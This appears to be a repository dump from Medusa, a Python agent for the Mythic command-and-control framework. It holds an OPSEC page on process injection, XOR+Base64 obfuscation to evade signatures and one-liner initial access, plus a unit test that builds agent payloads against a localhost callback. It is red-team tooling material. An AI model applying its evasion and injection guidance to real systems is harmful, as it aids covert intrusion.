    "content": "+++\ntitle = \"OPSEC\"\nchapter = false\nweight = 10\npre = \"<b>1. </b>\"\n+++\n\n### Process Execution\n\n- The `shell` command spawns a child process which is subject to command-line logging.\n- The `shinject` command (for Windows only) uses the well-known CreateRemoteThread injection technique.\n- The `load_dll` command (for Windows only) needs the DLL to respond with an integer value (and not exit the process) on completion.\n\n### Agent payload\n\nThe build parameters offer an XOR+Base64 obfuscation option. Rather than outputting a more trivially-signaturable script that is clearly readable, Mythic will bundle the code and XOR+Base64 it with a random key. This is then decrypted, decoded and run with `exec()` to ultimately execute the agent.\n\nWith the function `load` available, as well as the potential utility of the `cryptography` library, you could reduce your payload size and capabilities for initial access (potentially using a python one-liner to achieve code execution). The agent can then be updated with additional functions as required.\n\nAn example of the XOR payload compared to the plaintext script can be seen below:\n\n![XOR Payload](/agents/medusa/xor.png)\n"
  },
  {
    "path": "documentation-wrapper/.keep",
    "content": ""
  },
  {
    "path": "tests/test_payload_build_matrix.py",
    "content": "import asyncio\nimport importlib.util\nimport os\nimport pathlib\nimport py_compile\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport types\nimport unittest\n\n\nROOT = pathlib.Path(__file__).resolve().parents[1]\nBUILDER_PATH = ROOT / \"Payload_Type\" / \"medusa\" / \"medusa\" / \"mythic\" / \"agent_functions\" / \"builder.py\"\nAGENT_CODE_PATH = ROOT / \"Payload_Type\" / \"medusa\" / \"medusa\" / \"agent_code\"\nBASE_AGENT_PATH = AGENT_CODE_PATH / \"base_agent\"\n\nPROFILES = (\"http\", \"azure_blob\")\nPY_VERSIONS = (\"Python 2.7\", \"Python 3.8\")\nCRYPTO_IMPLEMENTATIONS = {\n    \"manual_crypto\": \"No\",\n    \"cryptography_lib\": \"Yes\",\n}\n\n\ndef discover_profiles():\n    py2_profiles = {\n        re.match(r\"transport_(.+)\\.py2$\", p.name).group(1)\n        for p in BASE_AGENT_PATH.glob(\"transport_*.py2\")\n        if re.match(r\"transport_(.+)\\.py2$\", p.name)\n    }\n    py3_profiles = {\n        re.match(r\"transport_(.+)\\.py3$\", p.name).group(1)\n        for p in BASE_AGENT_PATH.glob(\"transport_*.py3\")\n        if re.match(r\"transport_(.+)\\.py3$\", p.name)\n    }\n    return tuple(sorted(py2_profiles.intersection(py3_profiles)))\n\n\nPROFILES = discover_profiles()\n\n\ndef python_version_suffix(py_version):\n    return \"py2\" if py_version == \"Python 2.7\" else \"py3\"\n\n\ndef parse_transport_sections(template_code: str):\n    parts = re.split(r\"###\\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\\s*###\", template_code)\n    sections = {\"IMPORTS\": \"\", \"CLASS_FIELDS\": \"\", \"FUNCTIONS\": \"\", \"CONFIG\": \"\"}\n    for i in range(1, len(parts), 2):\n        sections[parts[i].strip()] = parts[i + 1].strip(\"\\n\")\n    return sections\n\n\ndef function_names_from_code(code: str):\n    return re.findall(r\"^\\s*def\\s+([A-Za-z_]\\w*)\\s*\\(\", code, flags=re.MULTILINE)\n\n\ndef config_keys_from_code(code: str):\n    return re.findall(r'\"([A-Za-z0-9_]+)\"\\s*:', code)\n\n\ndef 
install_fake_mythic_modules():\n    if \"mythic_container\" in sys.modules:\n        return\n\n    mythic_container = types.ModuleType(\"mythic_container\")\n    payload_builder = types.ModuleType(\"mythic_container.PayloadBuilder\")\n    command_base = types.ModuleType(\"mythic_container.MythicCommandBase\")\n    rpc_module = types.ModuleType(\"mythic_container.MythicRPC\")\n\n    class BuildStatus:\n        Success = \"success\"\n        Error = \"error\"\n\n    class BuildResponse:\n        def __init__(self, status=None):\n            self.status = status\n            self.build_stderr = \"\"\n            self.build_message = \"\"\n            self.payload = b\"\"\n\n        def set_status(self, status):\n            self.status = status\n\n    class BuildParameterType:\n        ChooseOne = \"ChooseOne\"\n\n    class BuildParameter:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    class BuildStep:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    class SupportedOS:\n        Windows = \"Windows\"\n        Linux = \"Linux\"\n        MacOS = \"MacOS\"\n\n    class PayloadType:\n        def get_parameter(self, name):\n            return self._params[name]\n\n    class MythicRPCOtherServiceRPCMessage:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    class MythicRPCPayloadUpdateBuildStepMessage:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    payload_builder.BuildStatus = BuildStatus\n    payload_builder.BuildResponse = BuildResponse\n    payload_builder.BuildParameterType = BuildParameterType\n    payload_builder.BuildParameter = BuildParameter\n    payload_builder.BuildStep = BuildStep\n    payload_builder.PayloadType = PayloadType\n    payload_builder.SupportedOS = SupportedOS\n\n    rpc_module.MythicRPCOtherServiceRPCMessage = MythicRPCOtherServiceRPCMessage\n    rpc_module.MythicRPCPayloadUpdateBuildStepMessage = 
MythicRPCPayloadUpdateBuildStepMessage\n\n    sys.modules[\"mythic_container\"] = mythic_container\n    sys.modules[\"mythic_container.PayloadBuilder\"] = payload_builder\n    sys.modules[\"mythic_container.MythicCommandBase\"] = command_base\n    sys.modules[\"mythic_container.MythicRPC\"] = rpc_module\n\n\ndef load_builder_module():\n    install_fake_mythic_modules()\n    spec = importlib.util.spec_from_file_location(\"medusa_builder_for_tests\", BUILDER_PATH)\n    module = importlib.util.module_from_spec(spec)\n    spec.loader.exec_module(module)\n    return module\n\n\nclass FakeCommands:\n    def get_commands(self):\n        return [\"cwd\", \"sleep\"]\n\n\nclass FakeC2:\n    def __init__(self, name, params):\n        self._name = name\n        self._params = params\n\n    def get_c2profile(self):\n        return {\"name\": self._name}\n\n    def get_parameters_dict(self):\n        return self._params\n\n\ndef base_c2_params():\n    return {\n        \"callback_host\": \"http://127.0.0.1\",\n        \"callback_port\": \"80\",\n        \"post_uri\": \"/api/v1.4/agent_message\",\n        \"get_uri\": \"/api/v1.4/agent_message\",\n        \"query_path_name\": \"q\",\n        \"proxy_host\": \"\",\n        \"proxy_user\": \"\",\n        \"proxy_pass\": \"\",\n        \"proxy_port\": \"\",\n        \"headers\": \"{}\",\n        \"killdate\": \"2099-01-01\",\n        \"callback_interval\": \"10\",\n        \"callback_jitter\": \"5\",\n        \"AESPSK\": {\n            \"value\": \"aes256_hmac\",\n            \"enc_key\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\n            \"dec_key\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\n        },\n        \"encrypted_exchange_check\": \"true\",\n    }\n\n\nasync def fake_update_build_step(_msg):\n    return None\n\n\nasync def fake_other_service_rpc(_msg):\n    return types.SimpleNamespace(\n        Success=True,\n        Error=\"\",\n        Result={\n            \"blob_endpoint\": 
\"https://example.blob.core.windows.net\",\n            \"container_name\": \"medusa\",\n            \"sas_token\": \"sp=racwdl&sv=2025-07-05&sr=c&sig=abc\",\n        },\n    )\n\n\nclass TestPayloadBuildMatrix(unittest.TestCase):\n    def test_profiles_auto_discovered(self):\n        self.assertTrue(PROFILES, \"No transport profiles were discovered from transport_*.py2/.py3 templates\")\n\n    def _selected_values(self, env_name, allowed):\n        selected = os.getenv(env_name, \"\").strip()\n        if not selected:\n            return allowed\n        self.assertIn(selected, allowed, msg=f\"Invalid {env_name}: {selected}\")\n        return (selected,)\n\n    def _build_payload(self, profile_name, python_version, use_non_default_crypto):\n        module = load_builder_module()\n        module.SendMythicRPCPayloadUpdatebuildStep = fake_update_build_step\n        module.SendMythicRPCOtherServiceRPC = fake_other_service_rpc\n\n        medusa = module.Medusa()\n        medusa.uuid = \"11111111-1111-1111-1111-111111111111\"\n        medusa.commands = FakeCommands()\n        medusa.agent_code_path = AGENT_CODE_PATH\n        medusa._params = {\n            \"python_version\": python_version,\n            \"use_non_default_cryptography_lib\": use_non_default_crypto,\n            \"obfuscate_script\": \"No\",\n            \"output\": \"py\",\n            \"https_check\": \"Yes\",\n        }\n        medusa.c2info = [FakeC2(profile_name, base_c2_params())]\n\n        return asyncio.run(medusa.build())\n\n    def _crypto_template_text(self, py_version, crypto_impl):\n        suffix = python_version_suffix(py_version)\n        crypto_file = \"crypto_lib\" if crypto_impl == \"cryptography_lib\" else \"manual_crypto\"\n        return (BASE_AGENT_PATH / f\"{crypto_file}.{suffix}\").read_text().strip()\n\n    def _transport_sections(self, py_version, profile):\n        suffix = python_version_suffix(py_version)\n        transport_code = (BASE_AGENT_PATH / 
f\"transport_{profile}.{suffix}\").read_text()\n        return parse_transport_sections(transport_code)\n\n    def test_dynamic_build_matrix(self):\n        profiles = self._selected_values(\"TEST_PROFILE\", PROFILES)\n        py_versions = self._selected_values(\"TEST_PYTHON_VERSION\", PY_VERSIONS)\n        crypto_impls = self._selected_values(\"TEST_CRYPTO_IMPL\", tuple(CRYPTO_IMPLEMENTATIONS.keys()))\n\n        for profile in profiles:\n            for py_version in py_versions:\n                for crypto_impl in crypto_impls:\n                    with self.subTest(profile=profile, py_version=py_version, crypto_impl=crypto_impl):\n                        resp = self._build_payload(profile, py_version, CRYPTO_IMPLEMENTATIONS[crypto_impl])\n                        self.assertEqual(resp.status, \"success\", msg=resp.build_stderr)\n                        self.assertTrue(resp.payload)\n                        source = resp.payload.decode()\n\n                        self.assertNotIn(\"TRANSPORT_IMPORTS\", source)\n                        self.assertNotIn(\"TRANSPORT_CLASS_FIELDS\", source)\n                        self.assertNotIn(\"TRANSPORT_FUNCTIONS\", source)\n                        self.assertNotIn(\"TRANSPORT_CONFIG\", source)\n                        self.assertNotIn(\"### IMPORTS ###\", source)\n                        self.assertNotIn(\"### FUNCTIONS ###\", source)\n\n                        transport_sections = self._transport_sections(py_version, profile)\n                        for func_name in function_names_from_code(transport_sections[\"FUNCTIONS\"]):\n                            self.assertIn(f\"def {func_name}\", source)\n\n                        for config_key in config_keys_from_code(transport_sections[\"CONFIG\"]):\n                            self.assertIn(f'\"{config_key}\"', source)\n\n                        params = base_c2_params()\n                        if profile == \"http\":\n                            self.assertIn(f'\"Server\": 
\"{params[\"callback_host\"]}\"', source)\n                        if profile == \"azure_blob\":\n                            expected_result = asyncio.run(fake_other_service_rpc(None)).Result\n                            self.assertIn(f'blob_endpoint = \"{expected_result[\"blob_endpoint\"]}\"', source)\n                            self.assertIn(f'container_name = \"{expected_result[\"container_name\"]}\"', source)\n\n                        crypto_template = self._crypto_template_text(py_version, crypto_impl)\n                        self.assertIn(crypto_template, source)\n\n                        if py_version == \"Python 3.8\":\n                            compile(source, f\"generated_{profile}_py3.py\", \"exec\")\n\n    def test_python3_payload_pycompile(self):\n        selected_py = os.getenv(\"TEST_PYTHON_VERSION\", \"\").strip()\n        if selected_py and selected_py != \"Python 3.8\":\n            self.skipTest(\"py_compile validation is only applicable to Python 3.8 payload output\")\n\n        py3 = shutil.which(\"python3\")\n        self.assertIsNotNone(py3)\n\n        profiles = self._selected_values(\"TEST_PROFILE\", PROFILES)\n        crypto_impls = self._selected_values(\"TEST_CRYPTO_IMPL\", tuple(CRYPTO_IMPLEMENTATIONS.keys()))\n\n        for profile in profiles:\n            for crypto_impl in crypto_impls:\n                with self.subTest(profile=profile, crypto_impl=crypto_impl):\n                    resp = self._build_payload(profile, \"Python 3.8\", CRYPTO_IMPLEMENTATIONS[crypto_impl])\n                    self.assertEqual(resp.status, \"success\", msg=resp.build_stderr)\n                    source = resp.payload.decode()\n                    with tempfile.NamedTemporaryFile(\"w\", suffix=\".py\", delete=False) as f:\n                        f.write(source)\n                        tmp_path = f.name\n                    try:\n                        py_compile.compile(tmp_path, doraise=True)\n                    except 
py_compile.PyCompileError as e:\n                        self.fail(str(e))\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n"
  }
]